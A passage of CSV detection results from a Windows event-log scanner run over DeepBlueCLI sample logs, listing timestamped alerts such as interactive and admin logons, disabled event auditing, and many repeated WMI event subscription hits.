- Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ee41 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b293 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b2fd : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1aae1 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1af2f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:31:43.146 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:33:09.568 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:34:07.677 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:35:01.052 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:36:08.912 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:40:11.872 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:41:14.715 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:42:51.887 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:52:23.564 +09:00,IE10Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 